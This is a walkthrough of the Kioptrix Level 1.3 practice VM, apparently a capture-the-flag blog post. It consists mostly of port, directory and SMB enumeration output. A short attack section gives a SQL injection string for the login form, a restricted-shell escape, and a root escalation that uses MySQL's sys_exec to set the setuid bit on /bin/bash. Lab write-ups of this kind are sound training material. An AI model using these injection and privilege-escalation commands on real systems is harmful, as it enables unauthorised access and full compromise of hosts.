Level 1.3
Kioptrix Level 1.3 (#4) Walkthrough
Enumeration
Nmap
Scanning the machine's open ports
nmap -sC -sV -oA nmap/Level4 192.168.43.242Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-12 04:21 EDT
Nmap scan report for 192.168.43.242
Host is up (0.00031s latency).
Not shown: 566 closed ports, 430 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey:
| 1024 9b:ad:4f:f2:1e:c5:f2:39:14:b9:d3:a0:0b:e8:41:71 (DSA)
|_ 2048 85:40:c6:d5:41:26:05:34:ad:f8:6e:f2:a7:6b:4f:0e (RSA)
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
|_http-title: Site doesn't have a title (text/html).
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.0.28a (workgroup: WORKGROUP)
MAC Address: 00:0C:29:1C:64:47 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: 2h00m02s, deviation: 2h49m43s, median: 1s
|_nbstat: NetBIOS name: KIOPTRIX4, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Unix (Samba 3.0.28a)
| Computer name: Kioptrix4
| NetBIOS computer name:
| Domain name: localdomain
| FQDN: Kioptrix4.localdomain
|_ System time: 2020-05-12T04:21:17-04:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 29.63 seconds
Dirb
dirb http://192.168.43.242-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Tue May 12 04:22:50 2020
URL_BASE: http://192.168.43.242/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.43.242/ ----
+ http://192.168.43.242/cgi-bin/ (CODE:403|SIZE:329)
==> DIRECTORY: http://192.168.43.242/images/
+ http://192.168.43.242/index (CODE:200|SIZE:1255)
+ http://192.168.43.242/index.php (CODE:200|SIZE:1255)
==> DIRECTORY: http://192.168.43.242/john/
+ http://192.168.43.242/logout (CODE:302|SIZE:0)
+ http://192.168.43.242/member (CODE:302|SIZE:220)
+ http://192.168.43.242/server-status (CODE:403|SIZE:334)
---- Entering directory: http://192.168.43.242/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://192.168.43.242/john/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
-----------------
END_TIME: Tue May 12 04:22:54 2020
DOWNLOADED: 4612 - FOUND: 6
What caught my eye was the /john page.
Enum4linux
enum4linux -a 192.168.43.242Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Tue May 12 04:23:50 2020
==========================
| Target Information |
==========================
Target ........... 192.168.43.242
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
======================================================
| Enumerating Workgroup/Domain on 192.168.43.242 |
======================================================
[+] Got domain/workgroup name: WORKGROUP
==============================================
| Nbtstat Information for 192.168.43.242 |
==============================================
Looking up status of 192.168.43.242
KIOPTRIX4 <00> - B <ACTIVE> Workstation Service
KIOPTRIX4 <03> - B <ACTIVE> Messenger Service
KIOPTRIX4 <20> - B <ACTIVE> File Server Service
WORKGROUP <1e> - <GROUP> B <ACTIVE> Browser Service Elections
WORKGROUP <00> - <GROUP> B <ACTIVE> Domain/Workgroup Name
MAC Address = 00-00-00-00-00-00
=======================================
| Session Check on 192.168.43.242 |
=======================================
[+] Server 192.168.43.242 allows sessions using username '', password ''
=============================================
| Getting domain SID for 192.168.43.242 |
=============================================
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup
========================================
| OS information on 192.168.43.242 |
========================================
Use of uninitialized value $os_info in concatenation (.) or string at ./enum4linux.pl line 464.
[+] Got OS info for 192.168.43.242 from smbclient:
[+] Got OS info for 192.168.43.242 from srvinfo:
KIOPTRIX4 Wk Sv PrQ Unx NT SNT Kioptrix4 server (Samba, Ubuntu)
platform_id : 500
os version : 4.9
server type : 0x809a03
===============================
| Users on 192.168.43.242 |
===============================
index: 0x1 RID: 0x1f5 acb: 0x00000010 Account: nobody Name: nobody Desc: (null)
index: 0x2 RID: 0xbbc acb: 0x00000010 Account: robert Name: ,,, Desc: (null)
index: 0x3 RID: 0x3e8 acb: 0x00000010 Account: root Name: root Desc: (null)
index: 0x4 RID: 0xbba acb: 0x00000010 Account: john Name: ,,, Desc: (null)
index: 0x5 RID: 0xbb8 acb: 0x00000010 Account: loneferret Name: loneferret,,, Desc: (null)
user:[nobody] rid:[0x1f5]
user:[robert] rid:[0xbbc]
user:[root] rid:[0x3e8]
user:[john] rid:[0xbba]
user:[loneferret] rid:[0xbb8]
===========================================
| Share Enumeration on 192.168.43.242 |
===========================================
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
IPC$ IPC IPC Service (Kioptrix4 server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.
Server Comment
--------- -------
Workgroup Master
--------- -------
WORKGROUP
[+] Attempting to map shares on 192.168.43.242
//192.168.43.242/print$ Mapping: DENIED, Listing: N/A
//192.168.43.242/IPC$ [E] Can't understand response:
NT_STATUS_NETWORK_ACCESS_DENIED listing \*
======================================================
| Password Policy Information for 192.168.43.242 |
======================================================
[E] Unexpected error from polenum:
[+] Attaching to 192.168.43.242 using a NULL share
[+] Trying protocol 139/SMB...
[!] Protocol failed: Missing required parameter 'digestmod'.
[+] Trying protocol 445/SMB...
[!] Protocol failed: Missing required parameter 'digestmod'.
[+] Retieved partial password policy with rpcclient:
Password Complexity: Disabled
Minimum Password Length: 0
================================
| Groups on 192.168.43.242 |
================================
[+] Getting builtin groups:
[+] Getting builtin group memberships:
[+] Getting local groups:
[+] Getting local group memberships:
[+] Getting domain groups:
[+] Getting domain group memberships:
=========================================================================
| Users on 192.168.43.242 via RID cycling (RIDS: 500-550,1000-1050) |
=========================================================================
[I] Found new SID: S-1-5-21-2529228035-991147148-3991031631
[I] Found new SID: S-1-22-1
[I] Found new SID: S-1-5-32
[+] Enumerating users using SID S-1-5-21-2529228035-991147148-3991031631 and logon username '', password ''
S-1-5-21-2529228035-991147148-3991031631-500 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-501 KIOPTRIX4\nobody (Local User)
S-1-5-21-2529228035-991147148-3991031631-502 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-503 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-504 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-505 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-506 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-507 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-508 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-509 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-510 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-511 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-512 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-513 KIOPTRIX4\None (Domain Group)
S-1-5-21-2529228035-991147148-3991031631-514 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-515 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-516 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-517 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-518 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-519 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-520 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-521 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-522 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-523 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-524 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-525 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-526 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-527 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-528 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-529 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-530 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-531 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-532 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-533 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-534 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-535 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-536 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-537 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-538 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-539 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-540 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-541 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-542 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-543 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-544 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-545 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-546 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-547 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-548 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-549 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-550 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-1000 KIOPTRIX4\root (Local User)
S-1-5-21-2529228035-991147148-3991031631-1001 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-1002 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-1003 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-1004 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-1005 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-1006 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-1007 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-1008 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-1009 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-1010 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-1011 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-1012 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-1013 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-1014 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-1015 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-1016 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-1017 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-1018 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-1019 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-1020 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-1021 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-1022 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-1023 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-1024 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-1025 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-1026 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-1027 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-1028 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-1029 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-1030 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-1031 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-1032 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-1033 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-1034 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-1035 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-1036 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-1037 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-1038 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-1039 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-1040 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-1041 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-1042 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-1043 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-1044 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-1045 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-1046 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-1047 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-1048 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-1049 *unknown*\*unknown* (8)
S-1-5-21-2529228035-991147148-3991031631-1050 *unknown*\*unknown* (8)
[+] Enumerating users using SID S-1-5-32 and logon username '', password ''
S-1-5-32-500 *unknown*\*unknown* (8)
S-1-5-32-501 *unknown*\*unknown* (8)
S-1-5-32-502 *unknown*\*unknown* (8)
S-1-5-32-503 *unknown*\*unknown* (8)
S-1-5-32-504 *unknown*\*unknown* (8)
S-1-5-32-505 *unknown*\*unknown* (8)
S-1-5-32-506 *unknown*\*unknown* (8)
S-1-5-32-507 *unknown*\*unknown* (8)
S-1-5-32-508 *unknown*\*unknown* (8)
S-1-5-32-509 *unknown*\*unknown* (8)
S-1-5-32-510 *unknown*\*unknown* (8)
S-1-5-32-511 *unknown*\*unknown* (8)
S-1-5-32-512 *unknown*\*unknown* (8)
S-1-5-32-513 *unknown*\*unknown* (8)
S-1-5-32-514 *unknown*\*unknown* (8)
S-1-5-32-515 *unknown*\*unknown* (8)
S-1-5-32-516 *unknown*\*unknown* (8)
S-1-5-32-517 *unknown*\*unknown* (8)
S-1-5-32-518 *unknown*\*unknown* (8)
S-1-5-32-519 *unknown*\*unknown* (8)
S-1-5-32-520 *unknown*\*unknown* (8)
S-1-5-32-521 *unknown*\*unknown* (8)
S-1-5-32-522 *unknown*\*unknown* (8)
S-1-5-32-523 *unknown*\*unknown* (8)
S-1-5-32-524 *unknown*\*unknown* (8)
S-1-5-32-525 *unknown*\*unknown* (8)
S-1-5-32-526 *unknown*\*unknown* (8)
S-1-5-32-527 *unknown*\*unknown* (8)
S-1-5-32-528 *unknown*\*unknown* (8)
S-1-5-32-529 *unknown*\*unknown* (8)
S-1-5-32-530 *unknown*\*unknown* (8)
S-1-5-32-531 *unknown*\*unknown* (8)
S-1-5-32-532 *unknown*\*unknown* (8)
S-1-5-32-533 *unknown*\*unknown* (8)
S-1-5-32-534 *unknown*\*unknown* (8)
S-1-5-32-535 *unknown*\*unknown* (8)
S-1-5-32-536 *unknown*\*unknown* (8)
S-1-5-32-537 *unknown*\*unknown* (8)
S-1-5-32-538 *unknown*\*unknown* (8)
S-1-5-32-539 *unknown*\*unknown* (8)
S-1-5-32-540 *unknown*\*unknown* (8)
S-1-5-32-541 *unknown*\*unknown* (8)
S-1-5-32-542 *unknown*\*unknown* (8)
S-1-5-32-543 *unknown*\*unknown* (8)
S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)
S-1-5-32-1000 *unknown*\*unknown* (8)
S-1-5-32-1001 *unknown*\*unknown* (8)
S-1-5-32-1002 *unknown*\*unknown* (8)
S-1-5-32-1003 *unknown*\*unknown* (8)
S-1-5-32-1004 *unknown*\*unknown* (8)
S-1-5-32-1005 *unknown*\*unknown* (8)
S-1-5-32-1006 *unknown*\*unknown* (8)
S-1-5-32-1007 *unknown*\*unknown* (8)
S-1-5-32-1008 *unknown*\*unknown* (8)
S-1-5-32-1009 *unknown*\*unknown* (8)
S-1-5-32-1010 *unknown*\*unknown* (8)
S-1-5-32-1011 *unknown*\*unknown* (8)
S-1-5-32-1012 *unknown*\*unknown* (8)
S-1-5-32-1013 *unknown*\*unknown* (8)
S-1-5-32-1014 *unknown*\*unknown* (8)
S-1-5-32-1015 *unknown*\*unknown* (8)
S-1-5-32-1016 *unknown*\*unknown* (8)
S-1-5-32-1017 *unknown*\*unknown* (8)
S-1-5-32-1018 *unknown*\*unknown* (8)
S-1-5-32-1019 *unknown*\*unknown* (8)
S-1-5-32-1020 *unknown*\*unknown* (8)
S-1-5-32-1021 *unknown*\*unknown* (8)
S-1-5-32-1022 *unknown*\*unknown* (8)
S-1-5-32-1023 *unknown*\*unknown* (8)
S-1-5-32-1024 *unknown*\*unknown* (8)
S-1-5-32-1025 *unknown*\*unknown* (8)
S-1-5-32-1026 *unknown*\*unknown* (8)
S-1-5-32-1027 *unknown*\*unknown* (8)
S-1-5-32-1028 *unknown*\*unknown* (8)
S-1-5-32-1029 *unknown*\*unknown* (8)
S-1-5-32-1030 *unknown*\*unknown* (8)
S-1-5-32-1031 *unknown*\*unknown* (8)
S-1-5-32-1032 *unknown*\*unknown* (8)
S-1-5-32-1033 *unknown*\*unknown* (8)
S-1-5-32-1034 *unknown*\*unknown* (8)
S-1-5-32-1035 *unknown*\*unknown* (8)
S-1-5-32-1036 *unknown*\*unknown* (8)
S-1-5-32-1037 *unknown*\*unknown* (8)
S-1-5-32-1038 *unknown*\*unknown* (8)
S-1-5-32-1039 *unknown*\*unknown* (8)
S-1-5-32-1040 *unknown*\*unknown* (8)
S-1-5-32-1041 *unknown*\*unknown* (8)
S-1-5-32-1042 *unknown*\*unknown* (8)
S-1-5-32-1043 *unknown*\*unknown* (8)
S-1-5-32-1044 *unknown*\*unknown* (8)
S-1-5-32-1045 *unknown*\*unknown* (8)
S-1-5-32-1046 *unknown*\*unknown* (8)
S-1-5-32-1047 *unknown*\*unknown* (8)
S-1-5-32-1048 *unknown*\*unknown* (8)
S-1-5-32-1049 *unknown*\*unknown* (8)
S-1-5-32-1050 *unknown*\*unknown* (8)
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\loneferret (Local User)
S-1-22-1-1001 Unix User\john (Local User)
S-1-22-1-1002 Unix User\robert (Local User)
===============================================
| Getting printer info for 192.168.43.242 |
===============================================
No printers returned.
enum4linux complete on Tue May 12 04:24:07 2020
from enum4linux, we know that there are 3 users available inside that machine
S-1-22-1-1000 Unix User\loneferret (Local User)
S-1-22-1-1001 Unix User\john (Local User)
S-1-22-1-1002 Unix User\robert (Local User)Exploit
We navigate to the page and saw this
I tried some SQL Injection and realized that only Password form is vulnerable.
So, from what username list I got from enum4linux, robert, john and loneferret, maybe we can get their password to login into their user account.
SQL injection that I've used at password form is admin'or 1=1 or ''='
robert's and john's credentials are below:
Meanwhile loneferret return this:
After this, we can try to ssh to both user and find what interesting inside
After got into robert account and I found out that if we navigate to the home and it does not let you to do so, after 2 times navigate to any directories, I got warnings and kicked out
As we can see only few commands are available for us
We are actually inside a restrictive shell, if we want to escape this restrictive shell, we need to type
echo os.system('/bin/bash')
After that, we got a proper shell and it is ready to escalate the privilege.
Privilege Escalation
I wander around and found something interesting
ps aux | grep root and I found something interesting
We know that mysql is running as root, so maybe this is the way to let us in.
and I also found out that in /var/www, checklogin.php, root has no password, so we can login directly without password
We logged into root
After surfing some websites on Google, I came across this website where it teaches how to exploit MySQL
With the guidance, we can type
mysql
use sql
SELECT sys_exec('chmod +s /bin/bash');
The exit the mysql shell
and type bash -p
and you will get root!
Congratulation!
Last updated
